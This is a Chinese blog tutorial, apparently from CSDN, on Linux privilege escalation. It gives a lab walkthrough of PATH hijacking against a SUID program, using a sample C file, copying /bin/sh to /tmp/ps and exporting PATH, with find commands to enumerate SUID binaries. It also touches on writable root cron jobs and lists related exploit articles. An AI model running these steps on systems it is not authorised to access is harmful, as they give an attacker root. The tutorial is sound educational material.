linux环境变量覆盖提权&配置不当导致的提权

已于 2023-03-03 12:16:22 修改
阅读量394 收藏
点赞数
分类专栏: windows+linux提权 文章标签: linux 运维 服务器 Powered by 金山文档
于 2023-03-02 23:54:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129310621
版权

一、linux环境变量覆盖提权

背景:

root用户给第三方程序suid权限

攻击者可以通过反编译,查看源代码的方式,知道代码执行逻辑,尝试进行环境变量覆盖提权。

复现:

本次环境ubuntun14.04

当系统执行命令时,其实就是调用了环境变量里的文件

下面这两者执行结果是一样的

id         
/bin/id

1.c文件编译后的1当作suid的第三方程序

  1. c内容:

#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("ps");
}
cd /tmp
gcc 1.c -o 1       #编译
chmod u+s 1        #给予1 suid权限
su test            #切换到test用户
test用户执行
cp /bin/sh /tmp/ps            
export PATH=/tmp:$PATH      #覆盖环境变量,不是永久性的
id

成功提权:

成功需要有两个条件:

(1)第三方程序是suid权限

(2)可以覆盖环境变量

find 查找suid权限的命令:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

1执行系统的ps命令,把/bin/sh/复制到/tmp/ps下,就是执行/tmp/ps执行的是/bin/sh,当覆盖变量后,执行1就相当于执行sh,而1是suid权限,使用root权限运行的所以,相当于root去执行sh

实战中:

  1. 通过find命令查找suid,去除系统命令,找第三方程序

  1. 把第三方程序反编译或运行,查看运行结果看调用了什么系统命令

  1. 尝试对命令执行的环境变量进行覆盖

二、配置不当导致的提权:

比如说linux的计划任务执行的文件权限设为755,777等权限,这些其他用户可以进行读写,会造成对里面的内容进行更改,最后造成提权。因为linux的计时任务时root用户运行的

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LINUX环境变量
Jinmindong
12-14 278
今天给大家带来了环境变量比较简单的方法不知道大家听明白了没有,环境变量中比较重要的就是结合suid限来展开,本文只是简单列举了其中的几个方法,因为本人也很少用这种方法,可能理解的不是很到位望大佬们指点,如果喜欢本文不妨一键三连支持一下。
linux 总结
weixin_51681694的博客
06-13 6817
会继续补充.....
linux利用环境变量
m0_63917373的博客
05-04 273
linux环境变量 linux
在java代码中取出linux中export的变量;读取系统现有的property,添加或覆盖...
weixin_34203832的博客
02-25 1007
2019独角兽企业重金招聘Python工程师标准&gt;&gt;&gt; ...
谈谈linux中那些非常规及其应用场景
阿道夫的博客
03-07 511
*原理:**本质上还是linux环境变量的那个原理,我之所以把这个案例拿过来,是因为我认为发现和分析用户自定义文件的这个过程及其思想是有价值的。环境变量的原理我之前写过一篇文章,感兴趣的师傅可以去看看,链接如下:https://www.freebuf.com/articles/system/320593.html通过常规的信息搜集,我发现内核和常规的sudo等手段都不可行,但是在使用以下命令的时候,发现了listinfo。
Linux手法总结以及 Linuxexp集合
02-22
Linux常见总结包括(内核漏洞、suid、定时任务、sudo等等)
Linux扫描脚本
最新发布
04-28
Linux扫描脚本
升-linux手法总结
01-14
升-linux手法总结
Linux Polkit本地
02-07
描述:Polkit 是用于在类 Unix 操作系统中控制系统范围特的组件。它为非特进程供了与特进 程进行通信的有组织的方式。CVE-2021-4034,polkit 的...利用:上传exp,给限执行cve-2021-4034-poc获得root
linux总结8大类型,30多种方式
09-27
linux总结8大类型,30多种方式 小白也能看明白的方法,包括内核,服务 sudo suidsgid 定时任务 nfs 等待
Kali linux 学习笔记(二十五)——配置不当 2020.3.5
闵行小鱼塘
03-05 710
与漏洞相比,利用配置不当更常用
Linux中使用环境变量进行
mingyqf的博客
10-24 1242
本文作者:secist,转载自FreeBuf.COM secist2018-06-20 13:00:306441867 在这篇文章中,我将会为大家介绍一些使用环境变量进行Linux的方法,包括在CTF challenges中使用到一些的技术。话不多说,让我们进入正题! 介绍 PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上执行任何命令时,它会通过PATH变量来响应用户执行的命令,并向shell发送请求以搜索可执行文件。超级...
linux用户覆盖全局(自定义)变量环境
weixin_30402085的博客
02-18 173
dev_ydzj_1@localhost usr]$ cd $HOME [dev_ydzj_1@localhost ~]$ pwd /home/dev_ydzj_1 [dev_ydzj_1@localhost ~]$ java -version java version "1.6.0_24" Java(TM) SE Runtime Environment (build 1.6....
Linux————Linux下三种不同方式的技巧
Fly_鹏程万里
05-16 3747
在渗透测试或者漏洞评估的过程中,是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞VulnOS version 2是VulHub上的一个Linux练习,当打开虚拟机后,可以看到获取到低限SHELL后我们通常做下面几件事1.检测操作系统的发...
Linux 定时任务&环境变量&数据库
qi_SJQ_的博客
02-04 2837
Linux环境变量安全-(aliyun,本地): 前:需要配合SUID进行环境变量且是本地用户环境下进行(因此比较难实现) 过程:手写调用文件-编译-复制文件-增加环境变量-执行触发。 //demo.c文件 #include&lt;unistd.h&gt; void main(){ setuid(0); setgid(0); system("ps"); } gcc demo.c -o shell //手写一个c语言文件,并上传编译为shell文件 cp /bin/sh ...
Linux第二篇-Linux SUID&劫持环境变量
Love&Share
11-18 1938
文章目录Linux SUIDDemo劫持环境变量其他骚思路 Linux SUID SUID是一种特殊的文件属性,它允许用户执行的文件已该文件的拥有者的身份运行,比如一个具有SUID属性的文件的拥有者是root用户,就可以root限运行 SUID是一种对二进制程序进行设置的特殊限,可以让二进制程序的执行者临时拥有属主的限(仅对拥有执行限的二进制程序有效)。例如,所有用户都可以执行passwd命令来修改自己的用户密码,而用户密码保存在/etc/shadow文件中。仔细查看这个文件就会发现.
linux用户环境变量替换系统环境变量
lxyoucan的博客
03-21 562
path变量Linux环境中写在前面的优先级高。 比如:centos7中使用yum install java安装了jdk8。相当于系统环境变量中jdk是8。如果你想要在用户环境变量配置jdk11,我一开始是这样配置的。 PATH=$PATH:$HOME/bin:/root/jdk-11.0.10/bin java -version openjdk version "1.8.0_282" OpenJDK Runtime Environment (build 1.8.0_282-b08) OpenJDK
linux环境变量失效的解决方案
热门推荐
第七宇林的博客
07-10 1万+
ubuntu设置环境变量后可能出现以下几个问题: 在当前终端有效,重启终端或新打开终端失效 在root用户下有效,普通用户无效 所有用户,任意终端都有效,但是电脑重启后无效 环境变量设置明明正确无误,但是显示的是以前的版本,而非当前设置的 针对以上存在的4个问题说明ubuntu环境变量的设置: ubuntu系统支持3种环境变量的设置。 设置环境变量 多个路径用冒号隔开. 以下以gcc和java...
linux环境变量原理
08-13
回答: 在Linux环境中,原理是通过修改可执行文件的限或者改变执行环境变量来获取Root限。一种方法是将可执行文件设置为Set-UID或Set-GID,并将其所有者设置为Root,这样当普通用户执行该文件时,实际上是以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值